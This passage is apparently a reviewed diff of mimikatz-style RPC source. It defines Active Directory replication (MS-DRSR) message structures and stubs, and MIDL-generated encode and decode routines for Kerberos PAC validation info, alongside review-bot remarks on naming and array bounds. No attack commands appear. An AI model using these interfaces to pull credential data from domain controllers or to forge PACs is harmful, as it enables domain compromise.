USN_VECTOR usnvecFrom;
USN_VECTOR usnvecTo;
UPTODATE_VECTOR_V2_EXT *pUpToDateVecSrc;
SCHEMA_PREFIX_TABLE PrefixTableSrc;
ULONG ulExtendedRet;
ULONG cNumObjects;
ULONG cNumBytes;
REPLENTINFLIST *pObjects;
BOOL fMoreData;
ULONG cNumNcSizeObjects;
ULONG cNumNcSizeValues;
DWORD cNumValues;
REPLVALINF_V3 *rgValues;
DWORD dwDRSError;
} DRS_MSG_GETCHGREPLY_V9;
typedef struct _DRS_COMPRESSED_BLOB {
DWORD cbUncompressedSize;
DWORD cbCompressedSize;
BYTE *pbCompressedData;
} DRS_COMPRESSED_BLOB;
typedef struct _DRS_MSG_GETCHGREQ_V5 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDestV1;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
ULARGE_INTEGER liFsmoInfo;
} DRS_MSG_GETCHGREQ_V5;
typedef struct _DRS_MSG_GETCHGREQ_V8 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
ULARGE_INTEGER liFsmoInfo;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
SCHEMA_PREFIX_TABLE PrefixTableDest;
} DRS_MSG_GETCHGREQ_V8;
typedef struct _DRS_MSG_GETCHGREQ_V10 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
ULARGE_INTEGER liFsmoInfo;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
SCHEMA_PREFIX_TABLE PrefixTableDest;
ULONG ulMoreFlags;
} DRS_MSG_GETCHGREQ_V10;
typedef union _DRS_MSG_GETCHGREQ {
DRS_MSG_GETCHGREQ_V4 V4;
DRS_MSG_GETCHGREQ_V5 V5;
DRS_MSG_GETCHGREQ_V7 V7;
DRS_MSG_GETCHGREQ_V8 V8;
DRS_MSG_GETCHGREQ_V10 V10;
} DRS_MSG_GETCHGREQ;
typedef struct _DRS_MSG_GETCHGREPLY_V2 {
DRS_COMPRESSED_BLOB CompressedV1;
} DRS_MSG_GETCHGREPLY_V2;
typedef enum _DRS_COMP_ALG_TYPE {
DRS_COMP_ALG_NONE = 0,
DRS_COMP_ALG_UNUSED = 1,
DRS_COMP_ALG_MSZIP = 2,
DRS_COMP_ALG_WIN2K3 = 3
} DRS_COMP_ALG_TYPE;
typedef struct _DRS_MSG_GETCHGREPLY_V7 {
DWORD dwCompressedVersion;
DRS_COMP_ALG_TYPE CompressionAlg;
DRS_COMPRESSED_BLOB CompressedAny;
} DRS_MSG_GETCHGREPLY_V7;
typedef union _DRS_MSG_GETCHGREPLY {
DRS_MSG_GETCHGREPLY_V1 V1;
DRS_MSG_GETCHGREPLY_V2 V2;
DRS_MSG_GETCHGREPLY_V6 V6;
DRS_MSG_GETCHGREPLY_V7 V7;
DRS_MSG_GETCHGREPLY_V9 V9;
} DRS_MSG_GETCHGREPLY;
typedef struct _DRS_MSG_CRACKREQ_V1 {
ULONG CodePage;
ULONG LocaleId;
DWORD dwFlags;
DWORD formatOffered;
DWORD formatDesired;
DWORD cNames;
WCHAR **rpNames;
} DRS_MSG_CRACKREQ_V1;
typedef union _DRS_MSG_CRACKREQ {
DRS_MSG_CRACKREQ_V1 V1;
} DRS_MSG_CRACKREQ;
typedef struct _DRS_MSG_CRACKREPLY_V1 {
DS_NAME_RESULTW *pResult;
} DRS_MSG_CRACKREPLY_V1;
typedef union _DRS_MSG_CRACKREPLY {
DRS_MSG_CRACKREPLY_V1 V1;
} DRS_MSG_CRACKREPLY;
typedef struct _DRS_MSG_DCINFOREQ_V1 {
WCHAR *Domain;
DWORD InfoLevel;
} DRS_MSG_DCINFOREQ_V1;
typedef union _DRS_MSG_DCINFOREQ {
DRS_MSG_DCINFOREQ_V1 V1;
} DRS_MSG_DCINFOREQ, *PDRS_MSG_DCINFOREQ;
typedef struct _DRS_MSG_DCINFOREPLY_V1 {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_1W *rItems;
} DRS_MSG_DCINFOREPLY_V1;
typedef struct _DRS_MSG_DCINFOREPLY_V2 {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_2W *rItems;
} DRS_MSG_DCINFOREPLY_V2;
typedef struct _DRS_MSG_DCINFOREPLY_V3 {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_3W *rItems;
} DRS_MSG_DCINFOREPLY_V3;
typedef struct _DRS_MSG_DCINFOREPLY_VFFFFFFFF {
DWORD cItems;
DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW *rItems;
} DRS_MSG_DCINFOREPLY_VFFFFFFFF;
typedef union _DRS_MSG_DCINFOREPLY {
DRS_MSG_DCINFOREPLY_V1 V1;
DRS_MSG_DCINFOREPLY_V2 V2;
DRS_MSG_DCINFOREPLY_V3 V3;
DRS_MSG_DCINFOREPLY_VFFFFFFFF VFFFFFFFF;
} DRS_MSG_DCINFOREPLY;
ULONG IDL_DRSBind(handle_t rpc_handle, UUID *puuidClientDsa, DRS_EXTENSIONS *pextClient, DRS_EXTENSIONS **ppextServer, DRS_HANDLE *phDrs);
ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs);
ULONG IDL_DRSGetNCChanges(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_GETCHGREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_GETCHGREPLY *pmsgOut);
ULONG IDL_DRSCrackNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_CRACKREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_CRACKREPLY *pmsgOut);
ULONG IDL_DRSDomainControllerInfo(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_DCINFOREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_DCINFOREPLY *pmsgOut);
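Review bot: `typedef struct REPLVALINF_V3 {` drops the leading underscore that every other tag in this header carries (`_REPLVALINF_V1`, `_DRS_MSG_GETCHGREPLY_V9`, …); it still compiles because tags and typedef names live in different namespaces, but it reads as a typo and `typedef struct _REPLVALINF_V3 {` keeps the convention. The structs that end in an `ANYSIZE_ARRAY` member say nowhere which sibling bounds the array; a one-line comment per struct would help, e.g. `/* cNumCursors entries */` on `rgCursors` in both `UPTODATE_VECTOR_V1_EXT` and `UPTODATE_VECTOR_V2_EXT`, `/* cAttrs entries */` on `rgPartialAttr`, `/* cNumProps entries */` on `rgMetaData`, `/* cb bytes */` on `rgb` in `DRS_EXTENSIONS`, and, presumably, `NameLen` for `StringName` in `DSNAME` and `mtx_namelen` for `mtx_name`, to be confirmed against MS-DRSR. These types are the out-parameters of `IDL_DRSGetNCChanges` and the other stubs, so the counts come from the remote DC and are what a consumer has to check before indexing the trailing array.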



@ -0,0 +1,5 @@
#pragma once
#include "kull_m_rpc.h"
typedef DWORD NET_API_STATUS;
typedef UNICODE_STRING RPC_UNICODE_STRING;
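Review bot: `typedef DWORD NET_API_STATUS;` duplicates the typedef the Windows SDK ships in `lmcons.h`; an identical redefinition is accepted by MSVC and by C11, but a translation unit that also includes the SDK header then carries two definitions of the same name and a C99-strict build rejects it. A comment recording the intent, such as `/* same as lmcons.h; kept local so this header does not depend on the LM API headers */`, would tell the next reader whether the duplication is deliberate, assuming that is the reason. `BackuprKey` in `kull_m_rpc_ms-bkrp.h` uses `NET_API_STATUS` while including only `kull_m_rpc.h`, so this header presumably has to be reachable from there; that dependency is worth stating explicitly.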


@ -0,0 +1,808 @@
#include "kull_m_rpc_ms-pac.h"
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning(disable: 4211) /* redefine extern to static */
#pragma warning(disable: 4232) /* dllimport identity*/
#pragma warning(disable: 4024) /* array to pointer mapping*/
#ifdef _M_X64
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_SIZE 351
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset 346
#elif defined _M_IX86
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_SIZE 561
#define _ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset 556
#endif
typedef struct _ms_pac_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_SIZE];
} ms_pac_MIDL_TYPE_FORMAT_STRING;
extern const ms_pac_MIDL_TYPE_FORMAT_STRING ms_pac__MIDL_TypeFormatString;
static const RPC_CLIENT_INTERFACE msKrbPac___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x3dde7c30, 0x0000, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}}, {1, 0}}, {{0x8A885D04, 0x1CEB, 0x11C9, {0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,};
static RPC_BINDING_HANDLE msKrbPac__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC msKrbPac_StubDesc = {(void *)& msKrbPac___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &msKrbPac__MIDL_AutoBindHandle, 0, 0, 0, 0, ms_pac__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
size_t PKERB_VALIDATION_INFO_AlignSize(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
void PKERB_VALIDATION_INFO_Encode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
void PKERB_VALIDATION_INFO_Decode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
void PKERB_VALIDATION_INFO_Free(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
#ifdef _M_X64
static const ms_pac_MIDL_TYPE_FORMAT_STRING ms_pac__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x0, /* FC_UP */
/* 4 */ NdrFcShort( 0x1e ), /* Offset= 30 (34) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x6 ), /* 6 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 14 */ NdrFcShort( 0x6 ), /* 6 */
/* 16 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 18 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (6) */
/* 20 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 22 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 24 */ NdrFcShort( 0x4 ), /* 4 */
/* 26 */ 0x4, /* Corr desc: FC_USMALL */
0x0, /* */
/* 28 */ NdrFcShort( 0xfff9 ), /* -7 */
/* 30 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 32 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 34 */
0x17, /* FC_CSTRUCT */
0x3, /* 3 */
/* 36 */ NdrFcShort( 0x8 ), /* 8 */
/* 38 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (22) */
/* 40 */ 0x2, /* FC_CHAR */
0x2, /* FC_CHAR */
/* 42 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 44 */ NdrFcShort( 0xffe0 ), /* Offset= -32 (12) */
/* 46 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 48 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ 0x2, /* FC_CHAR */
0x5b, /* FC_END */
/* 54 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 56 */ NdrFcShort( 0x8 ), /* 8 */
/* 58 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 60 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (48) */
/* 62 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 64 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 66 */ NdrFcShort( 0x10 ), /* 16 */
/* 68 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 70 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (54) */
/* 72 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 74 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 76 */ NdrFcShort( 0x10 ), /* 16 */
/* 78 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 80 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (64) */
/* 82 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 84 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 86 */ NdrFcShort( 0x10 ), /* 16 */
/* 88 */ NdrFcShort( 0x0 ), /* 0 */
/* 90 */ NdrFcShort( 0x6 ), /* Offset= 6 (96) */
/* 92 */ 0x36, /* FC_POINTER */
0x8, /* FC_LONG */
/* 94 */ 0x40, /* FC_STRUCTPAD4 */
0x5b, /* FC_END */
/* 96 */
0x12, 0x0, /* FC_UP */
/* 98 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (34) */
/* 100 */
0x12, 0x0, /* FC_UP */
/* 102 */ NdrFcShort( 0xffee ), /* Offset= -18 (84) */
/* 104 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 106 */ NdrFcShort( 0x8 ), /* 8 */
/* 108 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 110 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 112 */
0x12, 0x0, /* FC_UP */
/* 114 */ NdrFcShort( 0xfff6 ), /* Offset= -10 (104) */
/* 116 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 118 */ NdrFcShort( 0x2 ), /* 2 */
/* 120 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 122 */ NdrFcShort( 0x2 ), /* 2 */
/* 124 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 126 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 128 */ NdrFcShort( 0x0 ), /* 0 */
/* 130 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 132 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 134 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 136 */ NdrFcShort( 0x10 ), /* 16 */
/* 138 */ NdrFcShort( 0x0 ), /* 0 */
/* 140 */ NdrFcShort( 0x8 ), /* Offset= 8 (148) */
/* 142 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 144 */ 0x40, /* FC_STRUCTPAD4 */
0x36, /* FC_POINTER */
/* 146 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 148 */
0x12, 0x0, /* FC_UP */
/* 150 */ NdrFcShort( 0xffde ), /* Offset= -34 (116) */
/* 152 */
0x1d, /* FC_SMFARRAY */
0x3, /* 3 */
/* 154 */ NdrFcShort( 0x8 ), /* 8 */
/* 156 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 158 */
0x21, /* FC_BOGUS_ARRAY */
0x3, /* 3 */
/* 160 */ NdrFcShort( 0x0 ), /* 0 */
/* 162 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 164 */ NdrFcShort( 0x9c ), /* 156 */
/* 166 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 168 */ NdrFcLong( 0xffffffff ), /* -1 */
/* 172 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 174 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 176 */ NdrFcShort( 0xffb8 ), /* Offset= -72 (104) */
/* 178 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 180 */
0x21, /* FC_BOGUS_ARRAY */
0x3, /* 3 */
/* 182 */ NdrFcShort( 0x0 ), /* 0 */
/* 184 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 186 */ NdrFcShort( 0x110 ), /* 272 */
/* 188 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 190 */ NdrFcLong( 0xffffffff ), /* -1 */
/* 194 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 196 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 198 */ NdrFcShort( 0xff8e ), /* Offset= -114 (84) */
/* 200 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 202 */
0x21, /* FC_BOGUS_ARRAY */
0x3, /* 3 */
/* 204 */ NdrFcShort( 0x0 ), /* 0 */
/* 206 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 208 */ NdrFcShort( 0x128 ), /* 296 */
/* 210 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 212 */ NdrFcLong( 0xffffffff ), /* -1 */
/* 216 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 218 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 220 */ NdrFcShort( 0xff8c ), /* Offset= -116 (104) */
/* 222 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 224 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 226 */ NdrFcShort( 0x138 ), /* 312 */
/* 228 */ NdrFcShort( 0x0 ), /* 0 */
/* 230 */ NdrFcShort( 0x60 ), /* Offset= 96 (326) */
/* 232 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 234 */ NdrFcShort( 0xff7e ), /* Offset= -130 (104) */
/* 236 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 238 */ NdrFcShort( 0xff7a ), /* Offset= -134 (104) */
/* 240 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 242 */ NdrFcShort( 0xff76 ), /* Offset= -138 (104) */
/* 244 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 246 */ NdrFcShort( 0xff72 ), /* Offset= -142 (104) */
/* 248 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 250 */ NdrFcShort( 0xff6e ), /* Offset= -146 (104) */
/* 252 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 254 */ NdrFcShort( 0xff6a ), /* Offset= -150 (104) */
/* 256 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 258 */ NdrFcShort( 0xff84 ), /* Offset= -124 (134) */
/* 260 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 262 */ NdrFcShort( 0xff80 ), /* Offset= -128 (134) */
/* 264 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 266 */ NdrFcShort( 0xff7c ), /* Offset= -132 (134) */
/* 268 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 270 */ NdrFcShort( 0xff78 ), /* Offset= -136 (134) */
/* 272 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 274 */ NdrFcShort( 0xff74 ), /* Offset= -140 (134) */
/* 276 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 278 */ NdrFcShort( 0xff70 ), /* Offset= -144 (134) */
/* 280 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 282 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 284 */ 0x8, /* FC_LONG */
0x36, /* FC_POINTER */
/* 286 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 288 */ 0x0, /* 0 */
NdrFcShort( 0xff29 ), /* Offset= -215 (74) */
0x40, /* FC_STRUCTPAD4 */
/* 292 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 294 */ NdrFcShort( 0xff60 ), /* Offset= -160 (134) */
/* 296 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 298 */ NdrFcShort( 0xff5c ), /* Offset= -164 (134) */
/* 300 */ 0x36, /* FC_POINTER */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 302 */ 0x0, /* 0 */
NdrFcShort( 0xff69 ), /* Offset= -151 (152) */
0x8, /* FC_LONG */
/* 306 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 308 */ 0x0, /* 0 */
NdrFcShort( 0xff33 ), /* Offset= -205 (104) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 312 */ 0x0, /* 0 */
NdrFcShort( 0xff2f ), /* Offset= -209 (104) */
0x8, /* FC_LONG */
/* 316 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 318 */ 0x40, /* FC_STRUCTPAD4 */
0x36, /* FC_POINTER */
/* 320 */ 0x36, /* FC_POINTER */
0x8, /* FC_LONG */
/* 322 */ 0x40, /* FC_STRUCTPAD4 */
0x36, /* FC_POINTER */
/* 324 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 326 */
0x12, 0x0, /* FC_UP */
/* 328 */ NdrFcShort( 0xff56 ), /* Offset= -170 (158) */
/* 330 */
0x12, 0x0, /* FC_UP */
/* 332 */ NdrFcShort( 0xfed6 ), /* Offset= -298 (34) */
/* 334 */
0x12, 0x0, /* FC_UP */
/* 336 */ NdrFcShort( 0xff64 ), /* Offset= -156 (180) */
/* 338 */
0x12, 0x0, /* FC_UP */
/* 340 */ NdrFcShort( 0xfece ), /* Offset= -306 (34) */
/* 342 */
0x12, 0x0, /* FC_UP */
/* 344 */ NdrFcShort( 0xff72 ), /* Offset= -142 (202) */
/* 346 */
0x12, 0x0, /* FC_UP */
/* 348 */ NdrFcShort( 0xff84 ), /* Offset= -124 (224) */
0x0
}
};
#elif defined _M_IX86
static const ms_pac_MIDL_TYPE_FORMAT_STRING ms_pac__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x0, /* FC_UP */
/* 4 */ NdrFcShort( 0x1e ), /* Offset= 30 (34) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x6 ), /* 6 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 14 */ NdrFcShort( 0x6 ), /* 6 */
/* 16 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 18 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (6) */
/* 20 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 22 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 24 */ NdrFcShort( 0x4 ), /* 4 */
/* 26 */ 0x4, /* Corr desc: FC_USMALL */
0x0, /* */
/* 28 */ NdrFcShort( 0xfff9 ), /* -7 */
/* 30 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 32 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 34 */
0x17, /* FC_CSTRUCT */
0x3, /* 3 */
/* 36 */ NdrFcShort( 0x8 ), /* 8 */
/* 38 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (22) */
/* 40 */ 0x2, /* FC_CHAR */
0x2, /* FC_CHAR */
/* 42 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 44 */ NdrFcShort( 0xffe0 ), /* Offset= -32 (12) */
/* 46 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 48 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ 0x2, /* FC_CHAR */
0x5b, /* FC_END */
/* 54 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 56 */ NdrFcShort( 0x8 ), /* 8 */
/* 58 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 60 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (48) */
/* 62 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 64 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 66 */ NdrFcShort( 0x10 ), /* 16 */
/* 68 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 70 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (54) */
/* 72 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 74 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 76 */ NdrFcShort( 0x10 ), /* 16 */
/* 78 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 80 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (64) */
/* 82 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 84 */
0x16, /* FC_PSTRUCT */
0x3, /* 3 */
/* 86 */ NdrFcShort( 0x8 ), /* 8 */
/* 88 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 90 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 92 */ NdrFcShort( 0x0 ), /* 0 */
/* 94 */ NdrFcShort( 0x0 ), /* 0 */
/* 96 */ 0x12, 0x0, /* FC_UP */
/* 98 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (34) */
/* 100 */
0x5b, /* FC_END */
0x8, /* FC_LONG */
/* 102 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 104 */
0x12, 0x0, /* FC_UP */
/* 106 */ NdrFcShort( 0xffea ), /* Offset= -22 (84) */
/* 108 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 110 */ NdrFcShort( 0x8 ), /* 8 */
/* 112 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 114 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 116 */
0x12, 0x0, /* FC_UP */
/* 118 */ NdrFcShort( 0xfff6 ), /* Offset= -10 (108) */
/* 120 */
0x1d, /* FC_SMFARRAY */
0x3, /* 3 */
/* 122 */ NdrFcShort( 0x8 ), /* 8 */
/* 124 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 126 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 128 */ NdrFcShort( 0x2 ), /* 2 */
/* 130 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 132 */ NdrFcShort( 0x32 ), /* 50 */
/* 134 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 136 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 138 */ NdrFcShort( 0x30 ), /* 48 */
/* 140 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 142 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 144 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 146 */ NdrFcShort( 0x2 ), /* 2 */
/* 148 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
